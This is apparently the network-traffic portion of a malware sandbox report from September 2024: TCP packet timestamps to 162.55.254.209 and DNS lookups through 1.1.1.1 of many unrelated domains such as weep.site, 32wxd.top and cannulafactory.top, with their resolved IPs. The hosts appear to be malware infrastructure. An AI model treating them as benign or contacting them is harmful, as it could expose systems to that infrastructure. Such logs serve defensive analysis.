            Sep 2, 2024 09:10:09.701885939 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:09.701940060 CEST4975880192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:09.701950073 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:09.701962948 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:09.701973915 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:09.701987028 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:09.702013969 CEST4975880192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:09.702076912 CEST4975880192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:09.702079058 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:09.702130079 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:09.702142954 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:09.702177048 CEST4975880192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:09.702177048 CEST4975880192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:09.707034111 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:09.707094908 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:09.707154036 CEST4975880192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:10.772629023 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.772650957 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.772717953 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.772735119 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.772747040 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.772886992 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.772898912 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.772910118 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.772917986 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.772931099 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.772943020 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.772953987 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.772967100 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.773015022 CEST4975880192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:10.773015022 CEST4975880192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:10.773015022 CEST4975880192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:10.773015022 CEST4975880192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:10.773595095 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.773607016 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.773617029 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.773631096 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.773648024 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.773650885 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.773653984 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.773664951 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.773672104 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.773694038 CEST4975880192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:10.773744106 CEST4975880192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:10.774363995 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.774374008 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.774408102 CEST4975880192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:10.774430037 CEST4975880192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:10.774430037 CEST4975880192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:10.778162956 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.778177977 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.778192043 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.778439045 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.778453112 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.778481007 CEST4975880192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:10.778650045 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.778661966 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.778673887 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.778734922 CEST4975880192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:10.778734922 CEST4975880192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:10.778794050 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.778806925 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.779639959 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.779652119 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.779663086 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.779675007 CEST4975880192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:10.780477047 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.780500889 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.780503988 CEST4975880192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:10.780513048 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.780525923 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.780849934 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.780860901 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.780872107 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.780879974 CEST4975880192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:10.781354904 CEST4975880192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:10.781486034 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.781497955 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.781510115 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.781829119 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.781841040 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.781856060 CEST4975880192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:10.783332109 CEST8049758162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:10.784877062 CEST4975880192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:10.805974007 CEST4975880192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:11.813587904 CEST4975980192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:11.819514990 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:11.819612026 CEST4975980192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:11.831281900 CEST4975980192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:11.836906910 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.547661066 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.547687054 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.547698975 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.547723055 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.547734976 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.547749043 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.547764063 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.547769070 CEST4975980192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:12.547859907 CEST4975980192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:12.548160076 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.548173904 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.548187971 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.548240900 CEST4975980192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:12.548240900 CEST4975980192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:12.554428101 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.554514885 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.554527044 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.554629087 CEST4975980192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:12.554639101 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.555330992 CEST4975980192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:12.637191057 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.637295008 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.637306929 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.637320042 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.637361050 CEST4975980192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:12.637444019 CEST4975980192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:12.637474060 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.637561083 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.637576103 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.637669086 CEST4975980192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:12.637679100 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.637767076 CEST4975980192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:12.638242006 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.638366938 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.638608932 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.638695002 CEST4975980192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:12.638710976 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.638724089 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.638782978 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.638808966 CEST4975980192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:12.639410019 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.639478922 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.639492035 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.639506102 CEST4975980192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:12.639569044 CEST4975980192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:12.639575958 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.640204906 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.640252113 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.640266895 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.640279055 CEST4975980192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:12.640353918 CEST4975980192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:12.640379906 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.640450954 CEST4975980192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:12.641004086 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.641181946 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.641310930 CEST4975980192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:12.642210007 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.685477018 CEST4975980192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:12.726918936 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.726936102 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.726950884 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.727071047 CEST4975980192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:12.727096081 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.727108002 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.727121115 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.727135897 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.727243900 CEST4975980192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:12.727289915 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.727322102 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.727401018 CEST4975980192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:12.727420092 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.727432013 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.727487087 CEST4975980192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:12.727663040 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.727708101 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.727720976 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.727732897 CEST4975980192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:12.727832079 CEST4975980192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:12.727916956 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.727930069 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.728020906 CEST4975980192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:12.728367090 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.728419065 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.728430033 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.728648901 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.728661060 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.728673935 CEST4975980192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:12.728673935 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.728686094 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.728710890 CEST4975980192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:12.729125977 CEST4975980192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:12.729394913 CEST8049759162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:12.729476929 CEST4975980192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:14.794878006 CEST4975980192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:15.814137936 CEST4976080192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:15.819468021 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:15.821491957 CEST4976080192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:15.833070040 CEST4976080192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:15.838001966 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:15.838130951 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.588151932 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.588171005 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.588182926 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.588201046 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.588212967 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.588224888 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.588227034 CEST4976080192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:16.588237047 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.588251114 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.588275909 CEST4976080192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:16.588275909 CEST4976080192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:16.588300943 CEST4976080192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:16.588531971 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.588546991 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.588586092 CEST4976080192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:16.593468904 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.593775988 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.597521067 CEST4976080192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:16.670684099 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.675313950 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.675364971 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.675370932 CEST4976080192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:16.675379992 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.675421953 CEST4976080192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:16.675517082 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.675529957 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.675575018 CEST4976080192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:16.675774097 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.675873995 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.675887108 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.675915003 CEST4976080192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:16.676107883 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.676121950 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.676156044 CEST4976080192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:16.676762104 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.676805019 CEST4976080192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:16.676879883 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.676903009 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.676944017 CEST4976080192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:16.676966906 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.676980019 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.677028894 CEST4976080192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:16.677728891 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.677845955 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.677858114 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.677911997 CEST4976080192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:16.677949905 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.678040981 CEST4976080192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:16.680238962 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.680356026 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.680367947 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.680401087 CEST4976080192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:16.680428982 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.680478096 CEST4976080192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:16.758099079 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.758176088 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.758219957 CEST4976080192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:16.762716055 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.762809038 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.762820005 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.762856960 CEST4976080192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:16.762893915 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.762904882 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.762917995 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.762928009 CEST4976080192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:16.762932062 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.762981892 CEST4976080192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:16.763089895 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.763133049 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.763138056 CEST4976080192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:16.763309002 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.763370991 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.763382912 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.763385057 CEST4976080192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:16.763405085 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.763422012 CEST4976080192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:16.763525963 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.763539076 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.763551950 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.763571024 CEST4976080192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:16.763598919 CEST4976080192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:16.763933897 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.763946056 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.763957024 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.763968945 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.763979912 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.763983011 CEST4976080192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:16.763993979 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.764014959 CEST4976080192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:16.764030933 CEST4976080192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:16.764309883 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.764322042 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.764360905 CEST4976080192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:16.764570951 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.764580965 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.764590979 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.764605999 CEST8049760162.55.254.209192.168.2.6
            Sep 2, 2024 09:10:16.764611006 CEST4976080192.168.2.6162.55.254.209
            Sep 2, 2024 09:10:16.764656067 CEST4976080192.168.2.6162.55.254.209
            TimestampSource PortDest PortSource IPDest IP
            Sep 2, 2024 09:07:55.290949106 CEST5699753192.168.2.61.1.1.1
            Sep 2, 2024 09:07:55.303565025 CEST53569971.1.1.1192.168.2.6
            Sep 2, 2024 09:08:11.298551083 CEST5945453192.168.2.61.1.1.1
            Sep 2, 2024 09:08:11.315398932 CEST53594541.1.1.1192.168.2.6
            Sep 2, 2024 09:08:24.861310959 CEST5262353192.168.2.61.1.1.1
            Sep 2, 2024 09:08:24.930807114 CEST53526231.1.1.1192.168.2.6
            Sep 2, 2024 09:08:38.564289093 CEST5157453192.168.2.61.1.1.1
            Sep 2, 2024 09:08:38.580604076 CEST53515741.1.1.1192.168.2.6
            Sep 2, 2024 09:08:51.690073967 CEST6288453192.168.2.61.1.1.1
            Sep 2, 2024 09:08:52.552783966 CEST53628841.1.1.1192.168.2.6
            Sep 2, 2024 09:09:06.251571894 CEST5651253192.168.2.61.1.1.1
            Sep 2, 2024 09:09:06.429898024 CEST53565121.1.1.1192.168.2.6
            Sep 2, 2024 09:09:19.720585108 CEST5256953192.168.2.61.1.1.1
            Sep 2, 2024 09:09:20.030303955 CEST53525691.1.1.1192.168.2.6
            Sep 2, 2024 09:09:33.360928059 CEST5928853192.168.2.61.1.1.1
            Sep 2, 2024 09:09:33.953353882 CEST53592881.1.1.1192.168.2.6
            Sep 2, 2024 09:09:47.486208916 CEST5941453192.168.2.61.1.1.1
            Sep 2, 2024 09:09:47.497273922 CEST53594141.1.1.1192.168.2.6
            Sep 2, 2024 09:09:55.565248013 CEST5973453192.168.2.61.1.1.1
            Sep 2, 2024 09:09:55.676651001 CEST53597341.1.1.1192.168.2.6
            Sep 2, 2024 09:10:08.986649990 CEST5734853192.168.2.61.1.1.1
            Sep 2, 2024 09:10:09.011676073 CEST53573481.1.1.1192.168.2.6
            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Sep 2, 2024 09:07:55.290949106 CEST192.168.2.61.1.1.10x367eStandard query (0)www.weep.siteA (IP address)IN (0x0001)false
            Sep 2, 2024 09:08:11.298551083 CEST192.168.2.61.1.1.10xa47dStandard query (0)www.88nn.proA (IP address)IN (0x0001)false
            Sep 2, 2024 09:08:24.861310959 CEST192.168.2.61.1.1.10x118dStandard query (0)www.fontanerourgente.netA (IP address)IN (0x0001)false
            Sep 2, 2024 09:08:38.564289093 CEST192.168.2.61.1.1.10x964aStandard query (0)www.onlytradez.clubA (IP address)IN (0x0001)false
            Sep 2, 2024 09:08:51.690073967 CEST192.168.2.61.1.1.10x2443Standard query (0)www.32wxd.topA (IP address)IN (0x0001)false
            Sep 2, 2024 09:09:06.251571894 CEST192.168.2.61.1.1.10xd10eStandard query (0)www.jaxo.xyzA (IP address)IN (0x0001)false
            Sep 2, 2024 09:09:19.720585108 CEST192.168.2.61.1.1.10x40aaStandard query (0)www.xforum.techA (IP address)IN (0x0001)false
            Sep 2, 2024 09:09:33.360928059 CEST192.168.2.61.1.1.10xf346Standard query (0)www.cannulafactory.topA (IP address)IN (0x0001)false
            Sep 2, 2024 09:09:47.486208916 CEST192.168.2.61.1.1.10x8a5cStandard query (0)www.taapbit.onlineA (IP address)IN (0x0001)false
            Sep 2, 2024 09:09:55.565248013 CEST192.168.2.61.1.1.10x56f6Standard query (0)www.ayypromo.shopA (IP address)IN (0x0001)false
            Sep 2, 2024 09:10:08.986649990 CEST192.168.2.61.1.1.10x5bfStandard query (0)www.anaidittrich.comA (IP address)IN (0x0001)false
            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Sep 2, 2024 09:07:55.303565025 CEST1.1.1.1192.168.2.60x367eNo error (0)www.weep.siteweep.siteCNAME (Canonical name)IN (0x0001)false
            Sep 2, 2024 09:07:55.303565025 CEST1.1.1.1192.168.2.60x367eNo error (0)weep.site194.233.65.154A (IP address)IN (0x0001)false
            Sep 2, 2024 09:08:11.315398932 CEST1.1.1.1192.168.2.60xa47dNo error (0)www.88nn.pro45.157.69.194A (IP address)IN (0x0001)false
            Sep 2, 2024 09:08:24.930807114 CEST1.1.1.1192.168.2.60x118dNo error (0)www.fontanerourgente.netfontanerourgente.netCNAME (Canonical name)IN (0x0001)false
            Sep 2, 2024 09:08:24.930807114 CEST1.1.1.1192.168.2.60x118dNo error (0)fontanerourgente.net37.187.158.211A (IP address)IN (0x0001)false
            Sep 2, 2024 09:08:38.580604076 CEST1.1.1.1192.168.2.60x964aNo error (0)www.onlytradez.club167.172.133.32A (IP address)IN (0x0001)false
            Sep 2, 2024 09:08:52.552783966 CEST1.1.1.1192.168.2.60x2443No error (0)www.32wxd.top32wxd.topCNAME (Canonical name)IN (0x0001)false
            Sep 2, 2024 09:08:52.552783966 CEST1.1.1.1192.168.2.60x2443No error (0)32wxd.top206.119.82.116A (IP address)IN (0x0001)false
            Sep 2, 2024 09:09:06.429898024 CEST1.1.1.1192.168.2.60xd10eNo error (0)www.jaxo.xyz66.29.149.180A (IP address)IN (0x0001)false
            Sep 2, 2024 09:09:20.030303955 CEST1.1.1.1192.168.2.60x40aaNo error (0)www.xforum.tech103.224.182.242A (IP address)IN (0x0001)false
            Sep 2, 2024 09:09:33.953353882 CEST1.1.1.1192.168.2.60xf346No error (0)www.cannulafactory.top18.183.3.45A (IP address)IN (0x0001)false
            Sep 2, 2024 09:09:47.497273922 CEST1.1.1.1192.168.2.60x8a5cName error (3)www.taapbit.onlinenonenoneA (IP address)IN (0x0001)false
            Sep 2, 2024 09:09:55.676651001 CEST1.1.1.1192.168.2.60x56f6No error (0)www.ayypromo.shop176.57.64.102A (IP address)IN (0x0001)false
